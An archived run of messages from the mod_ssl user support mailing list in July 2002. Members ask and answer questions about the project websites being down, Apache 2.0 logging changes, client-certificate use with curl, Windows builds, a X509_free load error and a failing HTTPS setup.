From owner-modssl-users@modssl.org  Wed Jul 10 18:21:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA09653; Wed, 10 Jul 2002 18:20:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from dunenets.net id SAA09643; Wed, 10 Jul 2002 18:19:58 +0200 (MET DST)
Received: (qmail 12060 invoked from network); 10 Jul 2002 16:18:14 -0000
Received: from unknown (HELO mydomain.com) (127.0.0.1)
  by 127.0.0.1 with SMTP; 10 Jul 2002 16:18:14 -0000
Received: from 192.168.115.247
        (SquirrelMail authenticated user fredrik)
        by www.dunenets.net with HTTP;
        Wed, 10 Jul 2002 18:18:14 +0200 (CEST)
Message-ID: <2273.192.168.115.247.1026317894.squirrel@www.dunenets.net>
Date: Wed, 10 Jul 2002 18:18:14 +0200 (CEST)
Subject: Of topic...
From: "=?iso-8859-1?Q?Fredrik_Lindstr=F6m?=" 
To: 
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-Mailer: SquirrelMail (version 1.2.5)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "=?iso-8859-1?Q?Fredrik_Lindstr=F6m?=" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


But what has happend to the www.modssl.org and www.openssl.org sites??

Regards Fredrik

_________________
Fredrik Lindström
Dune Networks
www.dunenets.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 18:30:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA09887; Wed, 10 Jul 2002 18:29:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id SAA09846; Wed, 10 Jul 2002 18:27:25 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6AGNMQ3001890
	for ; Wed, 10 Jul 2002 12:23:22 -0400
Date: Wed, 10 Jul 2002 12:23:22 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: SSLLog's demise (was Re: freebsd SSLCryptoDevice)
In-Reply-To: <20020710070216.GA29386@marvin-lnx.staff.tdk.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 10 Jul 2002, Mads Toftum wrote:

>  Which is a really bad move IMHO - debugging with mod_ssl
> was very good, and easy to use, but now with 2.0 it has been hacked into
> something much less usable. Making the loglevel tie in with the general
> loglevel, you get debugging info from two places at once, that it _very_
> rarely makes sense to debug together.

FWIW, I was in the camp that totally agrees with this sentiment.  The
decision to get rid of it was by no means unanimous.  Feel free to start a
grassroots petition to get it added back in again.  :)  If the users want
it back, the users want it back...

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 18:30:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA09890; Wed, 10 Jul 2002 18:29:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id SAA09879; Wed, 10 Jul 2002 18:28:32 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Wed, 10 Jul 2002 10:25:44 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from ES01SNLNT.sandia.gov (es01snlnt.sandia.gov
 [134.253.130.4]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6AGSP2B020800 for ; Wed, 10 Jul 2002 10:28:25
 -0600 (MDT)
Received: by ES01SNLNT.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Wed, 10 Jul 2002 10:28:24 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Of topic...
Date: Wed, 10 Jul 2002 10:28:23 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 1132BF822948659-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAB09884
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i thikn they are done, but i don't know why

-----Original Message-----
From: Fredrik Lindström [mailto:fredrik@dunenets.net]
Sent: Wednesday, July 10, 2002 10:18 AM
To: modssl-users@modssl.org
Subject: Of topic...



But what has happend to the www.modssl.org and www.openssl.org sites??

Regards Fredrik

_________________
Fredrik Lindström
Dune Networks
www.dunenets.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 18:39:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA10268; Wed, 10 Jul 2002 18:38:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id SAA10242; Wed, 10 Jul 2002 18:37:12 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Wed, 10 Jul 2002 10:34:29 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6AGbA2B021645 for ; Wed, 10 Jul 2002 10:37:10
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id <3303TV02>; Wed, 10 Jul 2002 10:37:09 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Of topic...
Date: Wed, 10 Jul 2002 10:37:08 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 1132BD9F2955661-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA10265
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

it could be upgrades to the webserver.  Their mail server is still up.  If
you need access to a page simliar to the modssl page then go to
http://modssl.planetmirror.com it is relatively updated and for openssl go
to http://openssl.planetmirror.com.

-----Original Message-----
From: Ashmore, Samuel R [mailto:srashmo@sandia.gov]
Sent: Wednesday, July 10, 2002 10:28 AM
To: 'modssl-users@modssl.org'
Subject: RE: Of topic...


i think they are down, but i don't know why

-----Original Message-----
From: Fredrik Lindström [mailto:fredrik@dunenets.net]
Sent: Wednesday, July 10, 2002 10:18 AM
To: modssl-users@modssl.org
Subject: Of topic...



But what has happend to the www.modssl.org and www.openssl.org sites??

Regards Fredrik

_________________
Fredrik Lindström
Dune Networks
www.dunenets.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 21:29:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15690; Wed, 10 Jul 2002 21:28:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA15685; Wed, 10 Jul 2002 21:28:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DA5E74CE61C; Wed, 10 Jul 2002 21:28:01 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 48C40286B4; Wed, 10 Jul 2002 20:42:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grindelwald.www.ch.easynet.net id TAA12838; Wed, 10 Jul 2002 19:57:09 +0200 (MET DST)
Received: from pssalp1 (196.78.dyn-adsl.customer.ch.easynet.net [217.8.196.78])
	by grindelwald.www.ch.easynet.net (Postfix) with ESMTP id 5D129AC74C
	for ; Wed, 10 Jul 2002 20:40:12 +0200 (CEST)
From: "Laurent Bouvet" 
To: 
Subject: RE : Of topic...
Date: Wed, 10 Jul 2002 19:57:04 +0200
Message-ID: <000001c2283b$36502a00$b401a8c0@pssalp1>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA12850
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Laurent Bouvet" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You can go to ftp.modssl.org and ftp.openssl.org, they are up and
running, with all sources available!

Regards

Laurent

-----Message d'origine-----
De : owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] De la part de Ashmore, Samuel R
Envoyé : mercredi 10 juillet 2002 18:37
À : 'modssl-users@modssl.org'
Objet : RE: Of topic...


it could be upgrades to the webserver.  Their mail server is still up.
If you need access to a page simliar to the modssl page then go to
http://modssl.planetmirror.com it is relatively updated and for openssl
go to http://openssl.planetmirror.com.

-----Original Message-----
From: Ashmore, Samuel R [mailto:srashmo@sandia.gov]
Sent: Wednesday, July 10, 2002 10:28 AM
To: 'modssl-users@modssl.org'
Subject: RE: Of topic...


i think they are down, but i don't know why

-----Original Message-----
From: Fredrik Lindström [mailto:fredrik@dunenets.net]
Sent: Wednesday, July 10, 2002 10:18 AM
To: modssl-users@modssl.org
Subject: Of topic...



But what has happend to the www.modssl.org and www.openssl.org sites??

Regards Fredrik

_________________
Fredrik Lindström
Dune Networks
www.dunenets.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 14:13:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA25185; Thu, 11 Jul 2002 14:12:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from orion.it-sec.de id OAA25121; Thu, 11 Jul 2002 14:11:24 +0200 (MET DST)
Received: by orion.ibh.de with Internet Mail Service (5.5.2653.19)
	id ; Thu, 11 Jul 2002 14:08:18 +0200
Message-ID: 
From: Jochen Vogel 
To: "'modssl-users@modssl.org'" 
Subject: HTTPS Client with Client Certificate Function
Date: Thu, 11 Jul 2002 14:08:13 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA25142
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jochen Vogel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

i am searching a client with that a can time triggered get files from an
apache server restricted with password and client certificate authorization.

i created an apache server with modssl. created my own ca an created a
client certificate. if i try this certificate in IE i will be working. if i
try the 
certificate with curl he can´t set the public key file. curl will only be
working
if i cat the private key and the certificate in one file and using this.

-can someone tell me an other tool than curl witch well be commercial?

-is it ok that curl need the private key and when why?

thx for help
Jochen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 16:34:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA03557; Thu, 11 Jul 2002 16:33:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id QAA03376; Thu, 11 Jul 2002 16:31:23 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KJZ23L1C2O00PQN7@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 11 Jul 2002 15:30:53 +0100 (BST)
Received: from mdx-he-staff2.nw.mdx.ac.uk
 (mdx-he-staff2.mdx.ac.uk [158.94.89.4]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KJZ23IPCRS00UAK0@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 11 Jul 2002 15:30:49 +0100 (BST)
Received: from MDX-HE-STAFF2/SpoolDir by mdx-he-staff2.nw.mdx.ac.uk
 (Mercury 1.48); Thu, 11 Jul 2002 15:27:15 +0000
Received: from SpoolDir by MDX-HE-STAFF2 (Mercury 1.48); Thu,
 11 Jul 2002 15:26:58 +0000
Received: from [1] (158.94.89.72) by mdx-he-staff2.nw.mdx.ac.uk (Mercury 1.48)
 with ESMTP; Thu, 11 Jul 2002 15:26:51 +0000
Date: Thu, 11 Jul 2002 15:26:51 +0100
From: Alex Moon 
Subject: mod ssl for windows
In-reply-to: 
To: modssl-users@modssl.org
Message-id: <9C077CE3833@mdx-he-staff2.nw.mdx.ac.uk>
Organization: Middlesex University
MIME-version: 1.0
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi
Currently have a system working fine under Apache 1.3.19 on NT 
but cannot find a version of mod_ssl.so for NT that will work with 
1.3.26. Does one exist? 
Any info gratefully received
Alex



Technical Manager
Online Learning Support Unit
Middlesex University Business School

a.moon@mdx.ac.uk
020 8411 5092

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 16:42:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04330; Thu, 11 Jul 2002 16:40:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from intramed1.gip-cps.fr id QAA04223; Thu, 11 Jul 2002 16:39:31 +0200 (MET DST)
Received: from gipnt.gip-cps.fr (unverified) by intramed1.gip-cps.fr
 (Content Technologies SMTPRS 2.0.15) with ESMTP id  for ;
 jeu., 11 juil. 2002 16:40:00 +0200
Received: by GIPNT with Internet Mail Service (5.5.2650.21)
	id ; Thu, 11 Jul 2002 16:40:44 +0200
Message-Id: <21DC528204CCD211A89100E0292B7B16C01017@GIPNT>
From: JOURDAIN Philippe 
To: modssl-users@modssl.org
Subject: RE: mod ssl for windows
Date: Thu, 11 Jul 2002 16:40:43 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA04286
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: JOURDAIN Philippe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Wi
n32.zip


> -----Message d'origine-----
> De:	Alex Moon [SMTP:a.moon@mdx.ac.uk]
> Date:	jeudi 11 juillet 2002 16:27
> À:	modssl-users@modssl.org
> Objet:	mod ssl for windows
> 
> Hi
> Currently have a system working fine under Apache 1.3.19 on NT 
> but cannot find a version of mod_ssl.so for NT that will work with 
> 1.3.26. Does one exist? 
> Any info gratefully received
> Alex
> 
> 
> 
> Technical Manager
> Online Learning Support Unit
> Middlesex University Business School
> 
> a.moon@mdx.ac.uk
> 020 8411 5092
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 16:42:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04419; Thu, 11 Jul 2002 16:42:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id QAA04302; Thu, 11 Jul 2002 16:40:27 +0200 (MET DST)
From: Michael.Straessle@bk.admin.ch
Received: from mar01.bb.admin.ch (mar01.bb.admin.ch [193.5.222.71])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g6BEeQi09645
	for ; Thu, 11 Jul 2002 16:40:26 +0200 (METDST)
Received: from mas22.bb.admin.ch (mas22.bb.admin.ch [193.5.222.83])
	by mar01.bb.admin.ch (8.11.2/8.11.2) with SMTP id g6BEePq24173
	for ; Thu, 11 Jul 2002 16:40:25 +0200 (METDST)
Received: by ad01007exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id <3K4D6AJ4>; Thu, 11 Jul 2002 16:40:24 +0200
Message-ID: 
To: modssl-users@modssl.org
Subject: AW: mod ssl for windows
Date: Thu, 11 Jul 2002 16:40:18 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Hi
> Currently have a system working fine under Apache 1.3.19 on NT 
> but cannot find a version of mod_ssl.so for NT that will work with 
> 1.3.26. Does one exist? 
> Any info gratefully received
> Alex
> 
http://www.modssl.org/contrib/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 16:49:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA05242; Thu, 11 Jul 2002 16:49:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id QAA05158; Thu, 11 Jul 2002 16:48:01 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g6BElsh32617
	for ; Thu, 11 Jul 2002 10:47:54 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 11 Jul 2002 10:40:26 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: mod ssl for windows
Date: Thu, 11 Jul 2002 10:40:25 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Just as an FYI. This does not work with mod_jserv.

> -----Original Message-----
> From: JOURDAIN Philippe [mailto:P.JOURDAIN@gip-cps.fr]
> Sent: Thursday, July 11, 2002 10:41 AM
> To: modssl-users@modssl.org
> Subject: RE: mod ssl for windows
> 
> 
> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-
> Wi
> n32.zip
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 17:17:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07847; Thu, 11 Jul 2002 17:16:48 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA07729; Thu, 11 Jul 2002 17:15:29 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5362A4CE75F; Thu, 11 Jul 2002 17:15:26 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 53DC6286FB; Thu, 11 Jul 2002 17:11:11 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from purveyor6.dresdnerbank.de id OAA24902; Thu, 11 Jul 2002 14:06:24 +0200 (MET DST)
Received: from ffz00egp.wwz0me.mail.dresdner.net (unverified) by purveyor6.dresdnerbank.de
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Thu, 11 Jul 2002 14:01:17 +0200
Received: by ffz00egp.wwz0me.mail.dresdner.net with Internet Mail Service (5.5.2653.19)
	id <3S62APDM>; Thu, 11 Jul 2002 14:01:17 +0200
Message-ID: <60644C5CF4F2D511A0120001025F99BC44BF25@imf00sa1.immo.dresdner.net>
From: "Sauer, Adrian" 
To: "'modssl-users@modssl.org'" 
Subject: apache 2.0.39 + mod_ssl.so
Date: Thu, 11 Jul 2002 14:01:09 +0200
Importance: high
X-Priority: 1
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sauer, Adrian" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

...this error occurs during start with "-DSSL":
Cannot load /opt/apache_2.0.39/modules/mod_ssl.so into server:
/opt/apache_2.0.39/modules/mod_ssl.so: undefined symbol: X509_free

here is how i build it:
- tar -xzvf httpd....
- cd httpd
- ./configure --prefix="/opt/sauer/local/httpd" --enable-mods-shared=all
--disable-auth-digest --enable-deflate --disable-cern-meta
--disable-usertrack --disable-unique-id --enable-ssl
- make -j3
- make install

# ldd httpd
        libz.so.1 => /usr/lib/libz.so.1 (0x4001b000)
        libaprutil.so.0 => /opt/apache_2.0.39/lib/libaprutil.so.0
(0x40029000)
        libgdbm.so.2 => /usr/lib/libgdbm.so.2 (0x4003b000)
        libdb-3.3.so => /usr/lib/libdb-3.3.so (0x40041000)
        libexpat.so.0 => /opt/apache_2.0.39/lib/libexpat.so.0 (0x400c1000)
        libapr.so.0 => /opt/apache_2.0.39/lib/libapr.so.0 (0x400de000)
        libm.so.6 => /lib/libm.so.6 (0x400fc000)
        libcrypt.so.1 => /lib/libcrypt.so.1 (0x4011e000)
        libnsl.so.1 => /lib/libnsl.so.1 (0x4014b000)
        libdl.so.2 => /lib/libdl.so.2 (0x40161000)
        libpthread.so.0 => /lib/libpthread.so.0 (0x40165000)
        libc.so.6 => /lib/libc.so.6 (0x4017c000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

# ldd mod_ssl.so
        libc.so.6 => /lib/libc.so.6 (0x40030000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x80000000)


# ldd --version
ldd (GNU libc) 2.2.5
Copyright (C) 2002 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.


i also tried to install it with the installed version of openssl0.9.6d and
option "--with-ssl=/opt/openssl0.9.6d", but the same error occurs

what can i do ? 

thanx
  Adrian Sauer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 18:47:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA18098; Thu, 11 Jul 2002 18:46:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailFA12.rediffmail.com id SAA18085; Thu, 11 Jul 2002 18:46:07 +0200 (MET DST)
Received: (qmail 16391 invoked by uid 510); 11 Jul 2002 16:44:45 -0000
Date: 11 Jul 2002 16:44:45 -0000
Message-ID: <20020711164445.16390.qmail@mailFA12.rediffmail.com>
Received: from unknown (138.231.176.8) by rediffmail.com via HTTP; 11 Jul 2002 16:44:45 -0000
MIME-Version: 1.0
From: "Shalen" 
To: modssl-users@modssl.org
Subject: HTTPS not running
Content-type: text/plain;
	format=flowed
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shalen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  I am able to set up a http apache server using
  apache_1.3.26 and openssl-0.9.6d
   I also installed mod_ssl
   but when I write
   https://nessus
   I am not able to get anything
  but when I write
   http://nessus/
   I see the page,
Hey, it worked
    The SSL/TLS-aware Apache webserver was successfully
     installed
     I also ran                     
/usr/local/apache/bin/apachectl startssl
    But I am not able to run https server
     Can someone guide me
      I am in urgent need to set up https server

I am referring the page
http://www.modssl.org/docs/apachecon2001


Please suggest

_________________________________________________________
There is always a better job for you at Monsterindia.com.
Go now http://monsterindia.rediff.com/jobs

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 19:20:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20232; Thu, 11 Jul 2002 19:19:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id TAA20215; Thu, 11 Jul 2002 19:18:52 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Thu, 11 Jul 2002 11:16:06 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from ES01SNLNT.sandia.gov (es01snlnt.sandia.gov
 [134.253.130.4]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6BHIn2B017804 for ; Thu, 11 Jul 2002 11:18:49
 -0600 (MDT)
Received: by ES01SNLNT.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Thu, 11 Jul 2002 11:18:48 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: HTTPS not running
Date: Thu, 11 Jul 2002 11:18:46 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 113362DC3495774-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

check the error log

-----Original Message-----
